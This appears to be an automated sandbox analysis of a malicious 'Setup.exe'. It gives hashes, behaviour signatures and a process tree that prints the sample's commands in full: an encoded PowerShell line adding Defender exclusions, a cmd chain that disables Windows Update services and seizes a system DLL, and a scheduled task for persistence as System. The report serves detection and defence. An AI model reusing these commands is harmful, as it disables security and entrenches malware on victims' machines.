General
Target

Setup.exe

Filesize

4MB

Completed

05-05-2022 01:14

Task

behavioral2

Score
10/10
MD5

62ed80f638e9551e1e59b4ea9341bccd

SHA1

44196e8cb0f5774decf60e12215767f092c3c008

SHA256

c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf

SHA256

56ba1326b1d691838a77ba3e353b17421d5602d378a73e213b7bc045d3befd304ef5a1170df5ba30ef237df9ef2b18283d19fdf23c025291763c8751ae838cad

Malware Config
Signatures 17

Filter: none

Defense Evasion
Discovery
Impact
Persistence
  • Modifies security service
    reg.exe

    Tags

    TTPs

    Modify RegistryModify Existing Service

    Reported IOCs

    descriptioniocprocess
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Securityreg.exe
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0reg.exe
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1reg.exe
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInforeg.exe
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parametersreg.exe
  • Executes dropped EXE
    iexplor.exeiexplore.exe

    Reported IOCs

    pidprocess
    4712iexplor.exe
    4928iexplore.exe
  • Possible privilege escalation attempt
    takeown.exeicacls.exe

    Tags

    Reported IOCs

    pidprocess
    2412takeown.exe
    3924icacls.exe
  • Stops running service(s)

    Tags

    TTPs

    Modify Existing ServiceService Stop
  • Checks computer location settings
    iexplore.exe

    Description

    Looks up country code configured in the registry, likely geofence.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nationiexplore.exe
  • Modifies file permissions
    takeown.exeicacls.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pidprocess
    2412takeown.exe
    3924icacls.exe
  • Checks whether UAC is enabled
    iexplore.exe

    TTPs

    System Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUAiexplore.exe
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    25ip-api.com
  • Suspicious use of SetThreadContext
    iexplor.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 4712 set thread context of 6564712iexplor.exeAppLaunch.exe
  • Drops file in Program Files directory
    iexplore.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exeiexplore.exe
    File createdC:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exeiexplore.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    4268schtasks.exe
  • Modifies registry key
    reg.exereg.exereg.exereg.exereg.exe

    TTPs

    Modify Registry

    Reported IOCs

    pidprocess
    2296reg.exe
    3200reg.exe
    1316reg.exe
    4048reg.exe
    4264reg.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exeiexplore.exe

    Reported IOCs

    pidprocess
    3508powershell.exe
    3508powershell.exe
    4928iexplore.exe
  • Suspicious use of AdjustPrivilegeToken
    AppLaunch.exepowershell.exeiexplore.exetakeown.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege656AppLaunch.exe
    Token: SeDebugPrivilege3508powershell.exe
    Token: SeDebugPrivilege4928iexplore.exe
    Token: SeTakeOwnershipPrivilege2412takeown.exe
  • Suspicious use of WriteProcessMemory
    Setup.exeiexplor.exeiexplore.execmd.execmd.execmd.execmd.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 2540 wrote to memory of 47122540Setup.exeiexplor.exe
    PID 2540 wrote to memory of 47122540Setup.exeiexplor.exe
    PID 2540 wrote to memory of 47122540Setup.exeiexplor.exe
    PID 4712 wrote to memory of 6564712iexplor.exeAppLaunch.exe
    PID 4712 wrote to memory of 6564712iexplor.exeAppLaunch.exe
    PID 4712 wrote to memory of 6564712iexplor.exeAppLaunch.exe
    PID 4712 wrote to memory of 6564712iexplor.exeAppLaunch.exe
    PID 4712 wrote to memory of 6564712iexplor.exeAppLaunch.exe
    PID 2540 wrote to memory of 49282540Setup.exeiexplore.exe
    PID 2540 wrote to memory of 49282540Setup.exeiexplore.exe
    PID 4928 wrote to memory of 37164928iexplore.execmd.exe
    PID 4928 wrote to memory of 37164928iexplore.execmd.exe
    PID 3716 wrote to memory of 35083716cmd.exepowershell.exe
    PID 3716 wrote to memory of 35083716cmd.exepowershell.exe
    PID 4928 wrote to memory of 11404928iexplore.execmd.exe
    PID 4928 wrote to memory of 11404928iexplore.execmd.exe
    PID 1140 wrote to memory of 4681140cmd.exesc.exe
    PID 1140 wrote to memory of 4681140cmd.exesc.exe
    PID 4928 wrote to memory of 34164928iexplore.execmd.exe
    PID 4928 wrote to memory of 34164928iexplore.execmd.exe
    PID 1140 wrote to memory of 31521140cmd.exesc.exe
    PID 1140 wrote to memory of 31521140cmd.exesc.exe
    PID 3416 wrote to memory of 42683416cmd.exeschtasks.exe
    PID 3416 wrote to memory of 42683416cmd.exeschtasks.exe
    PID 1140 wrote to memory of 46561140cmd.exesc.exe
    PID 1140 wrote to memory of 46561140cmd.exesc.exe
    PID 1140 wrote to memory of 14921140cmd.exesc.exe
    PID 1140 wrote to memory of 14921140cmd.exesc.exe
    PID 1140 wrote to memory of 9281140cmd.exesc.exe
    PID 1140 wrote to memory of 9281140cmd.exesc.exe
    PID 1140 wrote to memory of 40481140cmd.exereg.exe
    PID 1140 wrote to memory of 40481140cmd.exereg.exe
    PID 1140 wrote to memory of 42641140cmd.exereg.exe
    PID 1140 wrote to memory of 42641140cmd.exereg.exe
    PID 1140 wrote to memory of 22961140cmd.exereg.exe
    PID 1140 wrote to memory of 22961140cmd.exereg.exe
    PID 1140 wrote to memory of 32001140cmd.exereg.exe
    PID 1140 wrote to memory of 32001140cmd.exereg.exe
    PID 1140 wrote to memory of 13161140cmd.exereg.exe
    PID 1140 wrote to memory of 13161140cmd.exereg.exe
    PID 4928 wrote to memory of 49804928iexplore.execmd.exe
    PID 4928 wrote to memory of 49804928iexplore.execmd.exe
    PID 1140 wrote to memory of 24121140cmd.exetakeown.exe
    PID 1140 wrote to memory of 24121140cmd.exetakeown.exe
    PID 4928 wrote to memory of 45924928iexplore.execmd.exe
    PID 4928 wrote to memory of 45924928iexplore.execmd.exe
    PID 1140 wrote to memory of 39241140cmd.exeicacls.exe
    PID 1140 wrote to memory of 39241140cmd.exeicacls.exe
    PID 4980 wrote to memory of 47244980cmd.exeschtasks.exe
    PID 4980 wrote to memory of 47244980cmd.exeschtasks.exe
    PID 4592 wrote to memory of 39604592cmd.exechoice.exe
    PID 4592 wrote to memory of 39604592cmd.exechoice.exe
Processes 28
  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        Suspicious use of AdjustPrivilegeToken
        PID:656
    • C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      Executes dropped EXE
      Checks computer location settings
      Checks whether UAC is enabled
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4928
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
        Suspicious use of WriteProcessMemory
        PID:3716
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:3508
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:1140
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:468
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:3152
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:4656
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:1492
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:928
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          Modifies registry key
          PID:4048
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          Modifies registry key
          PID:4264
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          Modifies security service
          Modifies registry key
          PID:2296
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          Modifies registry key
          PID:3200
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          Modifies registry key
          PID:1316
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          Suspicious use of AdjustPrivilegeToken
          PID:2412
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:3924
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
        Suspicious use of WriteProcessMemory
        PID:3416
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
          Creates scheduled task(s)
          PID:4268
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "iexplore"
        Suspicious use of WriteProcessMemory
        PID:4980
        • C:\Windows\system32\schtasks.exe
          schtasks /run /tn "iexplore"
          PID:4724
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"
        Suspicious use of WriteProcessMemory
        PID:4592
        • C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 3
          PID:3960
  • C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
    "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
    PID:2888
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
      PID:1284
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
    PID:3660
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Execution
          Exfiltration
            Impact
            Initial Access
              Lateral Movement
                Privilege Escalation
                  Replay Monitor
                  00:00 00:00
                  Downloads
                  • C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe

                    MD5

                    b55b2eeb1c60ffcaa901cc4abdf31b8a

                    SHA1

                    c973de0f8757cea293fda9879e34628dda785326

                    SHA256

                    73a77281ddc48bf1c1ffd435d1d23ede8d32158445964706fe8f6479198f3ca3

                    SHA512

                    858830b2902d6d30a27333c6e80fcc76e58651ae976b1549436d1453a83eca515f2c4e4c973caae1c439d679aa473f49f7627124b9068203bb83e9e4a9cb5a51

                  • C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe

                    MD5

                    7dda5a9e56bff009e082a6363074b05a

                    SHA1

                    38ff02206ca1ffb1c0fcefdc97e2def76a9d7597

                    SHA256

                    fe943a12e497f2577d894dc8d513e405d3802c9ec35301dc89b2793af0456ffa

                    SHA512

                    a266f19b2bd6df56895a48c732fa8241c388d8fb8466431b879424cc5efecac39b7814efe027af0e470d4bb10be6941f44eb6fd0942925c3c83f1c1b56ba4acb

                  • C:\Users\Admin\AppData\Local\Temp\iexplor.exe

                    MD5

                    eda59f27acd8bda62766b37d22b2c928

                    SHA1

                    9833be6e6cddf94c6ba133b73f4430ef89a88c9a

                    SHA256

                    4dfff026077aa93493edd7407dda28956a079f1618848af195934ab41f164472

                    SHA512

                    3b20fe50dc623ab0875750ea0051984309f4fa5bafc2d8649e28aeb6aaf18931ed92898d1c16777ff6359095d52be2ad57ea9885f8e69b991ba26f4c8e93802e

                  • C:\Users\Admin\AppData\Local\Temp\iexplor.exe

                    MD5

                    f2b4df4916720d45a5c7cbd2780faf31

                    SHA1

                    e3ece1ad3e7f5c99ea7a3b0b518437b3ffe58a79

                    SHA256

                    fcad65d4e642fe9900acd30a833ac5022fba9817588e75d4f89165e155a3ddcb

                    SHA512

                    115885c4e01550bedc3f650599df9cde2912b3bba585061e13bad45a9cea55de57c47f8a53edef12eaba9b8a7e9d1fc409f185158f542445683867d109ddf22a

                  • C:\Users\Admin\AppData\Local\Temp\iexplore.exe

                    MD5

                    8fee0276770975e0d83e8c80670366c6

                    SHA1

                    2fd836ae5043ec5e9b7189174460a0dbe81193a0

                    SHA256

                    e6eeca37aac7303a513ee93a54135ff031f23ab1d3370f4cbd61a1cea3bb7dcf

                    SHA512

                    a4548dad37fa5e31380caf948f9f0c8f5b564a3d5e3ff36771dc72d57e50f1c9bf929a8cb7bd9f0f9dadb489a08f20058ae00abd1b6acbf74bb1e178df208bcd

                  • C:\Users\Admin\AppData\Local\Temp\iexplore.exe

                    MD5

                    fa4116e7f437f187a871bce955a0e0c7

                    SHA1

                    597e2a573e79b4e3ccb3c0b720cfb951d87cc23a

                    SHA256

                    b0672e8230dfdf37dc1e90cdc09d36c6101ec1dcddc2b1346dcb49d7050769c9

                    SHA512

                    f1d4b1974971b8fde658c0e36836b4ad07ddcde31990fffcc4e657b9f90f7f11a4f619b518d2dd57f80e2ae05c81f2b7ae22f52691a4cf14d8b7b55a77845a72

                  • memory/468-152-0x0000000000000000-mapping.dmp

                  • memory/656-140-0x00000000064E0000-0x0000000006A84000-memory.dmp

                  • memory/656-139-0x00000000054F0000-0x0000000005556000-memory.dmp

                  • memory/656-134-0x0000000000400000-0x0000000000422000-memory.dmp

                  • memory/656-145-0x0000000006030000-0x00000000060C2000-memory.dmp

                  • memory/656-133-0x0000000000000000-mapping.dmp

                  • memory/928-158-0x0000000000000000-mapping.dmp

                  • memory/1140-151-0x0000000000000000-mapping.dmp

                  • memory/1284-173-0x0000000000000000-mapping.dmp

                  • memory/1316-163-0x0000000000000000-mapping.dmp

                  • memory/1492-157-0x0000000000000000-mapping.dmp

                  • memory/2296-161-0x0000000000000000-mapping.dmp

                  • memory/2412-165-0x0000000000000000-mapping.dmp

                  • memory/2888-172-0x00007FFD448B0000-0x00007FFD45371000-memory.dmp

                  • memory/3152-154-0x0000000000000000-mapping.dmp

                  • memory/3200-162-0x0000000000000000-mapping.dmp

                  • memory/3416-153-0x0000000000000000-mapping.dmp

                  • memory/3508-148-0x0000000000000000-mapping.dmp

                  • memory/3508-149-0x0000026DD17E0000-0x0000026DD1802000-memory.dmp

                  • memory/3508-150-0x00007FFD44790000-0x00007FFD45251000-memory.dmp

                  • memory/3660-174-0x0000000000000000-mapping.dmp

                  • memory/3716-147-0x0000000000000000-mapping.dmp

                  • memory/3924-167-0x0000000000000000-mapping.dmp

                  • memory/3960-169-0x0000000000000000-mapping.dmp

                  • memory/4048-159-0x0000000000000000-mapping.dmp

                  • memory/4264-160-0x0000000000000000-mapping.dmp

                  • memory/4268-155-0x0000000000000000-mapping.dmp

                  • memory/4592-166-0x0000000000000000-mapping.dmp

                  • memory/4656-156-0x0000000000000000-mapping.dmp

                  • memory/4712-130-0x0000000000000000-mapping.dmp

                  • memory/4724-168-0x0000000000000000-mapping.dmp

                  • memory/4928-146-0x00007FFD44790000-0x00007FFD45251000-memory.dmp

                  • memory/4928-144-0x0000000000750000-0x000000000096C000-memory.dmp

                  • memory/4928-141-0x0000000000000000-mapping.dmp

                  • memory/4980-164-0x0000000000000000-mapping.dmp